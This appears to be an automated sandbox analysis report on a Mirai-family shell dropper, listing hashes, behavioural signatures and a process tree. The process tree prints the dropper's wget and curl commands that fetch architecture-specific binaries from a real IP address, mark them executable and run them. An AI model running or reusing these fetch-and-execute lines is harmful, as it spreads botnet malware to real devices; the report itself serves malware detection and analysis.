Analysis
-
max time kernel
125s -
max time network
153s -
platform
ubuntu-18.04_amd64 -
resource
ubuntu1804-amd64-20240611-en -
resource tags
arch:amd64arch:i386image:ubuntu1804-amd64-20240611-enkernel:4.15.0-213-genericlocale:en-usos:ubuntu-18.04-amd64system -
submitted
07/12/2024, 14:42
Static task
static1
Behavioral task
behavioral1
Sample
1.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
1.sh
Resource
debian9-armhf-20240418-en
Behavioral task
behavioral3
Sample
1.sh
Resource
debian9-mipsbe-20240611-en
General
-
Target
1.sh
-
Size
2KB
-
MD5
5562819bed77a9cb62743843ee3a42ba
-
SHA1
7b3934c9807c5fa51b62ac5758f33c68015e8591
-
SHA256
cd702d5c5d94251d5a65095cac33dd51bac5b101f85800cedd37556c4ef4fa7e
-
SHA512
d907f11e575e06dbcf6936eeb0deaa7112eb2b063c54334c5f5fcd5cb3cb7d725419ce3dd4e9fc12c727b02fa0db090c50194638cdcbe68863ea0c7acd370611
Malware Config
Extracted
mirai
LZRD
Extracted
mirai
LZRD
Signatures
-
Mirai family
-
File and Directory Permissions Modification 1 TTPs 15 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 1514 chmod 1520 chmod 1540 chmod 1562 chmod 1612 chmod 1632 chmod 1530 chmod 1572 chmod 1592 chmod 1622 chmod 1642 chmod 1652 chmod 1582 chmod 1602 chmod 1550 chmod -
Executes dropped EXE 15 IoCs
ioc pid Process /tmp/Space 1515 Space /tmp/Space 1521 Space /tmp/Space 1531 Space /tmp/Space 1541 Space /tmp/Space 1551 Space /tmp/Space 1563 Space /tmp/Space 1573 Space /tmp/Space 1583 Space /tmp/Space 1593 Space /tmp/Space 1603 Space /tmp/Space 1613 Space /tmp/Space 1623 Space /tmp/Space 1633 Space /tmp/Space 1643 Space /tmp/Space 1653 Space -
Modifies Watchdog functionality 1 TTPs 28 IoCs
Malware like Mirai modifies the Watchdog to prevent it restarting an infected system.
description ioc Process File opened for modification /dev/watchdog Space File opened for modification /dev/misc/watchdog Space File opened for modification /dev/watchdog Space File opened for modification /dev/misc/watchdog Space File opened for modification /dev/watchdog Space File opened for modification /dev/watchdog Space File opened for modification /dev/misc/watchdog Space File opened for modification /dev/misc/watchdog Space File opened for modification /dev/misc/watchdog Space File opened for modification /dev/misc/watchdog Space File opened for modification /dev/watchdog Space File opened for modification /dev/watchdog Space File opened for modification /dev/watchdog Space File opened for modification /dev/watchdog Space File opened for modification /dev/watchdog Space File opened for modification /dev/misc/watchdog Space File opened for modification /dev/watchdog Space File opened for modification /dev/watchdog Space File opened for modification /dev/misc/watchdog Space File opened for modification /dev/watchdog Space File opened for modification /dev/misc/watchdog Space File opened for modification /dev/misc/watchdog Space File opened for modification /dev/misc/watchdog Space File opened for modification /dev/misc/watchdog Space File opened for modification /dev/watchdog Space File opened for modification /dev/misc/watchdog Space File opened for modification /dev/watchdog Space File opened for modification /dev/misc/watchdog Space -
Enumerates running processes
Discovers information about currently running processes on the system
-
Writes file to system bin folder 28 IoCs
description ioc Process File opened for modification /sbin/watchdog Space File opened for modification /bin/watchdog Space File opened for modification /sbin/watchdog Space File opened for modification /bin/watchdog Space File opened for modification /bin/watchdog Space File opened for modification /bin/watchdog Space File opened for modification /bin/watchdog Space File opened for modification /bin/watchdog Space File opened for modification /sbin/watchdog Space File opened for modification /bin/watchdog Space File opened for modification /sbin/watchdog Space File opened for modification /bin/watchdog Space File opened for modification /bin/watchdog Space File opened for modification /sbin/watchdog Space File opened for modification /sbin/watchdog Space File opened for modification /sbin/watchdog Space File opened for modification /sbin/watchdog Space File opened for modification /sbin/watchdog Space File opened for modification /sbin/watchdog Space File opened for modification /sbin/watchdog Space File opened for modification /bin/watchdog Space File opened for modification /sbin/watchdog Space File opened for modification /bin/watchdog Space File opened for modification /bin/watchdog Space File opened for modification /bin/watchdog Space File opened for modification /sbin/watchdog Space File opened for modification /bin/watchdog Space File opened for modification /sbin/watchdog Space -
resource yara_rule behavioral1/files/fstream-5.dat upx -
description ioc Process File opened for reading /proc/166/status Space File opened for reading /proc/174/status Space File opened for reading /proc/1102/status Space File opened for reading /proc/27/status Space File opened for reading /proc/683/status Space File opened for reading /proc/14/status Space File opened for reading /proc/964/status Space File opened for reading /proc/1174/status Space File opened for reading /proc/15/status Space File opened for reading /proc/458/status Space File opened for reading /proc/602/status Space File opened for reading /proc/596/status Space File opened for reading /proc/723/status Space File opened for reading /proc/1152/status Space File opened for reading /proc/1201/status Space File opened for reading /proc/130/status Space File opened for reading /proc/21/status Space File opened for reading /proc/130/status Space File opened for reading /proc/13/status Space File opened for reading /proc/668/status Space File opened for reading /proc/174/status Space File opened for reading /proc/1546/status Space File opened for reading /proc/527/status Space File opened for reading /proc/1158/status Space File opened for reading /proc/1073/status Space File opened for reading /proc/130/status Space File opened for reading /proc/716/status Space File opened for reading /proc/510/status Space File opened for reading /proc/1554/status Space File opened for reading /proc/14/status Space File opened for reading /proc/24/status Space File opened for reading /proc/962/status Space File opened for reading /proc/18/status Space File opened for reading /proc/1334/status Space File opened for reading /proc/1172/status Space File opened for reading /proc/179/status Space File opened for reading /proc/82/status Space File opened for reading /proc/656/status Space File opened for reading /proc/1311/status Space File opened for reading /proc/207/status Space File opened for reading /proc/1239/status Space File opened for reading /proc/180/status Space File opened for reading /proc/1524/status Space File opened for reading /proc/489/status Space File opened for reading /proc/20/status Space File opened for reading /proc/1554/status Space File opened for reading /proc/1142/status Space File opened for reading /proc/1172/status Space File opened for reading /proc/1174/status Space File opened for reading /proc/602/status Space File opened for reading /proc/460/status Space File opened for reading /proc/964/status Space File opened for reading /proc/178/status Space File opened for reading /proc/29/status Space File opened for reading /proc/168/status Space File opened for reading /proc/249/status Space File opened for reading /proc/28/status Space File opened for reading /proc/1363/status Space File opened for reading /proc/177/status Space File opened for reading /proc/723/status Space File opened for reading /proc/1045/status Space File opened for reading /proc/30/status Space File opened for reading /proc/1073/status Space File opened for reading /proc/79/status Space -
System Network Configuration Discovery 1 TTPs 4 IoCs
Adversaries may gather information about the network configuration of a system.
pid Process 1547 wget 1548 curl 1559 wget 1560 curl -
Writes file to tmp directory 30 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/Space.arc wget File opened for modification /tmp/Space.arm wget File opened for modification /tmp/Space.sparc curl File opened for modification /tmp/Space.m68k wget File opened for modification /tmp/Space.m68k curl File opened for modification /tmp/Space.mpsl curl File opened for modification /tmp/Space.arc curl File opened for modification /tmp/Space.ppc curl File opened for modification /tmp/Space.x86 curl File opened for modification /tmp/Space.x86_64 curl File opened for modification /tmp/Space.mips64 curl File opened for modification /tmp/Space.arm5 wget File opened for modification /tmp/Space.arm7 curl File opened for modification /tmp/Space.sh4 curl File opened for modification /tmp/Space.mips wget File opened for modification /tmp/Space.mips curl File opened for modification /tmp/Space.arm curl File opened for modification /tmp/Space.arm6 curl File opened for modification /tmp/Space.x86_64 wget File opened for modification /tmp/Space.i686 wget File opened for modification /tmp/Space.arm7 wget File opened for modification /tmp/Space.sh4 wget File opened for modification /tmp/Space 1.sh File opened for modification /tmp/Space.i686 curl File opened for modification /tmp/Space.arm6 wget File opened for modification /tmp/Space.ppc wget File opened for modification /tmp/busybox cp File opened for modification /tmp/Space.x86 wget File opened for modification /tmp/Space.mpsl wget File opened for modification /tmp/Space.arm5 curl
Processes
-
/tmp/1.sh/tmp/1.sh1⤵
- Writes file to tmp directory
PID:1497 -
/bin/cpcp /bin/busybox /tmp/2⤵
- Writes file to tmp directory
PID:1498
-
-
/usr/bin/wgetwget http://64.235.45.196/hiddenbin/Space.arc2⤵
- Writes file to tmp directory
PID:1499
-
-
/usr/bin/curlcurl -O http://64.235.45.196/hiddenbin/Space.arc2⤵
- Writes file to tmp directory
PID:1512
-
-
/bin/catcat Space.arc2⤵PID:1513
-
-
/bin/chmodchmod +x 1.sh busybox config-err-WSc3G3 netplan_sl6cks9p snap-private-tmp Space Space.arc ssh-hlYRIaBlcMzr systemd-private-aff032fe4301446191c7feed4a3fb51f-bolt.service-GFuQdq systemd-private-aff032fe4301446191c7feed4a3fb51f-colord.service-gjAwvo systemd-private-aff032fe4301446191c7feed4a3fb51f-ModemManager.service-0OKl5o systemd-private-aff032fe4301446191c7feed4a3fb51f-systemd-resolved.service-qc2DKP systemd-private-aff032fe4301446191c7feed4a3fb51f-systemd-timedated.service-ogBFyU2⤵
- File and Directory Permissions Modification
PID:1514
-
-
/tmp/Space./Space2⤵
- Executes dropped EXE
PID:1515
-
-
/usr/bin/wgetwget http://64.235.45.196/hiddenbin/Space.x862⤵
- Writes file to tmp directory
PID:1517
-
-
/usr/bin/curlcurl -O http://64.235.45.196/hiddenbin/Space.x862⤵
- Writes file to tmp directory
PID:1518
-
-
/bin/catcat Space.x862⤵PID:1519
-
-
/bin/chmodchmod +x 1.sh busybox config-err-WSc3G3 netplan_sl6cks9p snap-private-tmp Space Space.arc Space.x86 ssh-hlYRIaBlcMzr systemd-private-aff032fe4301446191c7feed4a3fb51f-bolt.service-GFuQdq systemd-private-aff032fe4301446191c7feed4a3fb51f-colord.service-gjAwvo systemd-private-aff032fe4301446191c7feed4a3fb51f-ModemManager.service-0OKl5o systemd-private-aff032fe4301446191c7feed4a3fb51f-systemd-resolved.service-qc2DKP systemd-private-aff032fe4301446191c7feed4a3fb51f-systemd-timedated.service-ogBFyU2⤵
- File and Directory Permissions Modification
PID:1520
-
-
/tmp/Space./Space2⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Writes file to system bin folder
- Reads runtime system information
PID:1521
-
-
/usr/bin/wgetwget http://64.235.45.196/hiddenbin/Space.x86_642⤵
- Writes file to tmp directory
PID:1527
-
-
/usr/bin/curlcurl -O http://64.235.45.196/hiddenbin/Space.x86_642⤵
- Writes file to tmp directory
PID:1528
-
-
/bin/chmodchmod +x 1.sh busybox config-err-WSc3G3 netplan_sl6cks9p snap-private-tmp Space Space.arc Space.x86 Space.x86_64 ssh-hlYRIaBlcMzr systemd-private-aff032fe4301446191c7feed4a3fb51f-bolt.service-GFuQdq systemd-private-aff032fe4301446191c7feed4a3fb51f-colord.service-gjAwvo systemd-private-aff032fe4301446191c7feed4a3fb51f-ModemManager.service-0OKl5o systemd-private-aff032fe4301446191c7feed4a3fb51f-systemd-resolved.service-qc2DKP systemd-private-aff032fe4301446191c7feed4a3fb51f-systemd-timedated.service-ogBFyU2⤵
- File and Directory Permissions Modification
PID:1530
-
-
/tmp/Space./Space2⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Writes file to system bin folder
- Reads runtime system information
PID:1531
-
-
/usr/bin/wgetwget http://64.235.45.196/hiddenbin/Space.i6862⤵
- Writes file to tmp directory
PID:1537
-
-
/usr/bin/curlcurl -O http://64.235.45.196/hiddenbin/Space.i6862⤵
- Writes file to tmp directory
PID:1538
-
-
/bin/chmodchmod +x 1.sh busybox config-err-WSc3G3 netplan_sl6cks9p snap-private-tmp Space Space.arc Space.i686 Space.x86 Space.x86_64 ssh-hlYRIaBlcMzr systemd-private-aff032fe4301446191c7feed4a3fb51f-bolt.service-GFuQdq systemd-private-aff032fe4301446191c7feed4a3fb51f-colord.service-gjAwvo systemd-private-aff032fe4301446191c7feed4a3fb51f-ModemManager.service-0OKl5o systemd-private-aff032fe4301446191c7feed4a3fb51f-systemd-resolved.service-qc2DKP systemd-private-aff032fe4301446191c7feed4a3fb51f-systemd-timedated.service-ogBFyU2⤵
- File and Directory Permissions Modification
PID:1540
-
-
/tmp/Space./Space2⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Writes file to system bin folder
- Reads runtime system information
PID:1541
-
-
/usr/bin/wgetwget http://64.235.45.196/hiddenbin/Space.mips2⤵
- System Network Configuration Discovery
- Writes file to tmp directory
PID:1547
-
-
/usr/bin/curlcurl -O http://64.235.45.196/hiddenbin/Space.mips2⤵
- System Network Configuration Discovery
- Writes file to tmp directory
PID:1548
-
-
/bin/chmodchmod +x 1.sh busybox config-err-WSc3G3 netplan_sl6cks9p snap-private-tmp Space Space.arc Space.i686 Space.mips Space.x86 Space.x86_64 ssh-hlYRIaBlcMzr systemd-private-aff032fe4301446191c7feed4a3fb51f-bolt.service-GFuQdq systemd-private-aff032fe4301446191c7feed4a3fb51f-colord.service-gjAwvo systemd-private-aff032fe4301446191c7feed4a3fb51f-ModemManager.service-0OKl5o systemd-private-aff032fe4301446191c7feed4a3fb51f-systemd-resolved.service-qc2DKP systemd-private-aff032fe4301446191c7feed4a3fb51f-systemd-timedated.service-ogBFyU2⤵
- File and Directory Permissions Modification
PID:1550
-
-
/tmp/Space./Space2⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Writes file to system bin folder
- Reads runtime system information
PID:1551
-
-
/usr/bin/wgetwget http://64.235.45.196/hiddenbin/Space.mips642⤵
- System Network Configuration Discovery
PID:1559
-
-
/usr/bin/curlcurl -O http://64.235.45.196/hiddenbin/Space.mips642⤵
- System Network Configuration Discovery
- Writes file to tmp directory
PID:1560
-
-
/bin/chmodchmod +x 1.sh busybox config-err-WSc3G3 netplan_sl6cks9p snap-private-tmp Space Space.arc Space.i686 Space.mips Space.mips64 Space.x86 Space.x86_64 ssh-hlYRIaBlcMzr systemd-private-aff032fe4301446191c7feed4a3fb51f-bolt.service-GFuQdq systemd-private-aff032fe4301446191c7feed4a3fb51f-colord.service-gjAwvo systemd-private-aff032fe4301446191c7feed4a3fb51f-ModemManager.service-0OKl5o systemd-private-aff032fe4301446191c7feed4a3fb51f-systemd-resolved.service-qc2DKP2⤵
- File and Directory Permissions Modification
PID:1562
-
-
/tmp/Space./Space2⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Writes file to system bin folder
- Reads runtime system information
PID:1563
-
-
/usr/bin/wgetwget http://64.235.45.196/hiddenbin/Space.mpsl2⤵
- Writes file to tmp directory
PID:1569
-
-
/usr/bin/curlcurl -O http://64.235.45.196/hiddenbin/Space.mpsl2⤵
- Writes file to tmp directory
PID:1570
-
-
/bin/chmodchmod +x 1.sh busybox config-err-WSc3G3 netplan_sl6cks9p snap-private-tmp Space Space.arc Space.i686 Space.mips Space.mips64 Space.mpsl Space.x86 Space.x86_64 ssh-hlYRIaBlcMzr systemd-private-aff032fe4301446191c7feed4a3fb51f-bolt.service-GFuQdq systemd-private-aff032fe4301446191c7feed4a3fb51f-colord.service-gjAwvo systemd-private-aff032fe4301446191c7feed4a3fb51f-ModemManager.service-0OKl5o systemd-private-aff032fe4301446191c7feed4a3fb51f-systemd-resolved.service-qc2DKP2⤵
- File and Directory Permissions Modification
PID:1572
-
-
/tmp/Space./Space2⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Writes file to system bin folder
- Reads runtime system information
PID:1573
-
-
/usr/bin/wgetwget http://64.235.45.196/hiddenbin/Space.arm2⤵
- Writes file to tmp directory
PID:1579
-
-
/usr/bin/curlcurl -O http://64.235.45.196/hiddenbin/Space.arm2⤵
- Writes file to tmp directory
PID:1580
-
-
/bin/chmodchmod +x 1.sh busybox config-err-WSc3G3 netplan_sl6cks9p snap-private-tmp Space Space.arc Space.arm Space.i686 Space.mips Space.mips64 Space.mpsl Space.x86 Space.x86_64 ssh-hlYRIaBlcMzr systemd-private-aff032fe4301446191c7feed4a3fb51f-bolt.service-GFuQdq systemd-private-aff032fe4301446191c7feed4a3fb51f-colord.service-gjAwvo systemd-private-aff032fe4301446191c7feed4a3fb51f-ModemManager.service-0OKl5o systemd-private-aff032fe4301446191c7feed4a3fb51f-systemd-resolved.service-qc2DKP2⤵
- File and Directory Permissions Modification
PID:1582
-
-
/tmp/Space./Space2⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Writes file to system bin folder
- Reads runtime system information
PID:1583
-
-
/usr/bin/wgetwget http://64.235.45.196/hiddenbin/Space.arm52⤵
- Writes file to tmp directory
PID:1589
-
-
/usr/bin/curlcurl -O http://64.235.45.196/hiddenbin/Space.arm52⤵
- Writes file to tmp directory
PID:1590
-
-
/bin/chmodchmod +x 1.sh busybox config-err-WSc3G3 netplan_sl6cks9p snap-private-tmp Space Space.arc Space.arm Space.arm5 Space.i686 Space.mips Space.mips64 Space.mpsl Space.x86 Space.x86_64 ssh-hlYRIaBlcMzr systemd-private-aff032fe4301446191c7feed4a3fb51f-bolt.service-GFuQdq systemd-private-aff032fe4301446191c7feed4a3fb51f-colord.service-gjAwvo systemd-private-aff032fe4301446191c7feed4a3fb51f-ModemManager.service-0OKl5o systemd-private-aff032fe4301446191c7feed4a3fb51f-systemd-resolved.service-qc2DKP2⤵
- File and Directory Permissions Modification
PID:1592
-
-
/tmp/Space./Space2⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Writes file to system bin folder
- Reads runtime system information
PID:1593
-
-
/usr/bin/wgetwget http://64.235.45.196/hiddenbin/Space.arm62⤵
- Writes file to tmp directory
PID:1599
-
-
/usr/bin/curlcurl -O http://64.235.45.196/hiddenbin/Space.arm62⤵
- Writes file to tmp directory
PID:1600
-
-
/bin/chmodchmod +x 1.sh busybox config-err-WSc3G3 netplan_sl6cks9p snap-private-tmp Space Space.arc Space.arm Space.arm5 Space.arm6 Space.i686 Space.mips Space.mips64 Space.mpsl Space.x86 Space.x86_64 ssh-hlYRIaBlcMzr systemd-private-aff032fe4301446191c7feed4a3fb51f-bolt.service-GFuQdq systemd-private-aff032fe4301446191c7feed4a3fb51f-colord.service-gjAwvo systemd-private-aff032fe4301446191c7feed4a3fb51f-ModemManager.service-0OKl5o systemd-private-aff032fe4301446191c7feed4a3fb51f-systemd-resolved.service-qc2DKP2⤵
- File and Directory Permissions Modification
PID:1602
-
-
/tmp/Space./Space2⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Writes file to system bin folder
- Reads runtime system information
PID:1603
-
-
/usr/bin/wgetwget http://64.235.45.196/hiddenbin/Space.arm72⤵
- Writes file to tmp directory
PID:1609
-
-
/usr/bin/curlcurl -O http://64.235.45.196/hiddenbin/Space.arm72⤵
- Writes file to tmp directory
PID:1610
-
-
/bin/chmodchmod +x 1.sh busybox config-err-WSc3G3 netplan_sl6cks9p snap-private-tmp Space Space.arc Space.arm Space.arm5 Space.arm6 Space.arm7 Space.i686 Space.mips Space.mips64 Space.mpsl Space.x86 Space.x86_64 ssh-hlYRIaBlcMzr systemd-private-aff032fe4301446191c7feed4a3fb51f-bolt.service-GFuQdq systemd-private-aff032fe4301446191c7feed4a3fb51f-colord.service-gjAwvo systemd-private-aff032fe4301446191c7feed4a3fb51f-ModemManager.service-0OKl5o systemd-private-aff032fe4301446191c7feed4a3fb51f-systemd-resolved.service-qc2DKP2⤵
- File and Directory Permissions Modification
PID:1612
-
-
/tmp/Space./Space2⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Writes file to system bin folder
- Reads runtime system information
PID:1613
-
-
/usr/bin/wgetwget http://64.235.45.196/hiddenbin/Space.ppc2⤵
- Writes file to tmp directory
PID:1619
-
-
/usr/bin/curlcurl -O http://64.235.45.196/hiddenbin/Space.ppc2⤵
- Writes file to tmp directory
PID:1620
-
-
/bin/chmodchmod +x 1.sh busybox config-err-WSc3G3 netplan_sl6cks9p snap-private-tmp Space Space.arc Space.arm Space.arm5 Space.arm6 Space.arm7 Space.i686 Space.mips Space.mips64 Space.mpsl Space.ppc Space.x86 Space.x86_64 ssh-hlYRIaBlcMzr systemd-private-aff032fe4301446191c7feed4a3fb51f-bolt.service-GFuQdq systemd-private-aff032fe4301446191c7feed4a3fb51f-colord.service-gjAwvo systemd-private-aff032fe4301446191c7feed4a3fb51f-ModemManager.service-0OKl5o systemd-private-aff032fe4301446191c7feed4a3fb51f-systemd-resolved.service-qc2DKP2⤵
- File and Directory Permissions Modification
PID:1622
-
-
/tmp/Space./Space2⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Writes file to system bin folder
- Reads runtime system information
PID:1623
-
-
/usr/bin/wgetwget http://64.235.45.196/hiddenbin/Space.sparc2⤵PID:1629
-
-
/usr/bin/curlcurl -O http://64.235.45.196/hiddenbin/Space.sparc2⤵
- Writes file to tmp directory
PID:1630
-
-
/bin/chmodchmod +x 1.sh busybox config-err-WSc3G3 netplan_sl6cks9p snap-private-tmp Space Space.arc Space.arm Space.arm5 Space.arm6 Space.arm7 Space.i686 Space.mips Space.mips64 Space.mpsl Space.ppc Space.sparc Space.x86 Space.x86_64 ssh-hlYRIaBlcMzr systemd-private-aff032fe4301446191c7feed4a3fb51f-bolt.service-GFuQdq systemd-private-aff032fe4301446191c7feed4a3fb51f-colord.service-gjAwvo systemd-private-aff032fe4301446191c7feed4a3fb51f-ModemManager.service-0OKl5o systemd-private-aff032fe4301446191c7feed4a3fb51f-systemd-resolved.service-qc2DKP2⤵
- File and Directory Permissions Modification
PID:1632
-
-
/tmp/Space./Space2⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Writes file to system bin folder
- Reads runtime system information
PID:1633
-
-
/usr/bin/wgetwget http://64.235.45.196/hiddenbin/Space.m68k2⤵
- Writes file to tmp directory
PID:1639
-
-
/usr/bin/curlcurl -O http://64.235.45.196/hiddenbin/Space.m68k2⤵
- Writes file to tmp directory
PID:1640
-
-
/bin/chmodchmod +x 1.sh busybox config-err-WSc3G3 netplan_sl6cks9p snap-private-tmp Space Space.arc Space.arm Space.arm5 Space.arm6 Space.arm7 Space.i686 Space.m68k Space.mips Space.mips64 Space.mpsl Space.ppc Space.sparc Space.x86 Space.x86_64 ssh-hlYRIaBlcMzr systemd-private-aff032fe4301446191c7feed4a3fb51f-bolt.service-GFuQdq systemd-private-aff032fe4301446191c7feed4a3fb51f-colord.service-gjAwvo systemd-private-aff032fe4301446191c7feed4a3fb51f-ModemManager.service-0OKl5o systemd-private-aff032fe4301446191c7feed4a3fb51f-systemd-resolved.service-qc2DKP2⤵
- File and Directory Permissions Modification
PID:1642
-
-
/tmp/Space./Space2⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Writes file to system bin folder
- Reads runtime system information
PID:1643
-
-
/usr/bin/wgetwget http://64.235.45.196/hiddenbin/Space.sh42⤵
- Writes file to tmp directory
PID:1649
-
-
/usr/bin/curlcurl -O http://64.235.45.196/hiddenbin/Space.sh42⤵
- Writes file to tmp directory
PID:1650
-
-
/bin/chmodchmod +x 1.sh busybox config-err-WSc3G3 netplan_sl6cks9p snap-private-tmp Space Space.arc Space.arm Space.arm5 Space.arm6 Space.arm7 Space.i686 Space.m68k Space.mips Space.mips64 Space.mpsl Space.ppc Space.sh4 Space.sparc Space.x86 Space.x86_64 ssh-hlYRIaBlcMzr systemd-private-aff032fe4301446191c7feed4a3fb51f-bolt.service-GFuQdq systemd-private-aff032fe4301446191c7feed4a3fb51f-colord.service-gjAwvo systemd-private-aff032fe4301446191c7feed4a3fb51f-ModemManager.service-0OKl5o systemd-private-aff032fe4301446191c7feed4a3fb51f-systemd-resolved.service-qc2DKP2⤵
- File and Directory Permissions Modification
PID:1652
-
-
/tmp/Space./Space2⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Writes file to system bin folder
- Reads runtime system information
PID:1653
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
37KB
MD5aec405b96527fb13ac254737c4e99388
SHA1c6accf2fe5ead7e9eb8bfe46083c2c26c981a812
SHA256643028ebd06ad279eaec9747223df4f8f37f8ac25dad3836d5dab7ac06ddec25
SHA512cd83c16a621448a8a622987f99a4e21d12432eb7aee58354ca9ad076f2a5ed136e8726aca5ae6b759746cbd1a1f7b88ccc637b2a2a75249a954dba2fd791038c
-
Filesize
113KB
MD585a94700ab0be116bd593ba440c7a408
SHA126a4c515cbc06940c20c50d88c8910ba09fe6341
SHA256b0dc38b80815fa4189ca8f3b607da6ddc060623d61696afc0bd0aaf90261de43
SHA5126bc8be6c6feb701e49ab221cf5fb92d253c353d7dde98499439c861af999e42f68674e9d99dbbc688abc2bf7c02312198028605c924dc6d5ba2ef18220e42622
-
Filesize
2.0MB
MD5b4dede5fc0b1bad5cb8e901bde126b97
SHA110cbe9a418ad84a1ed297948539d37aeb58dd810
SHA256a9f0735d28f9a6a4f2634d3b144156f7b3df3b476a16a5ab0c7bdf98d74dd020
SHA51245665ce3a42f63a01fdef517e0c4cb943efce64c8a32d3ce07ab4f1fafc23cda77f378d324342efc79dc9d2293c4b4454d06c1cf4997b9e866784de01cb546e6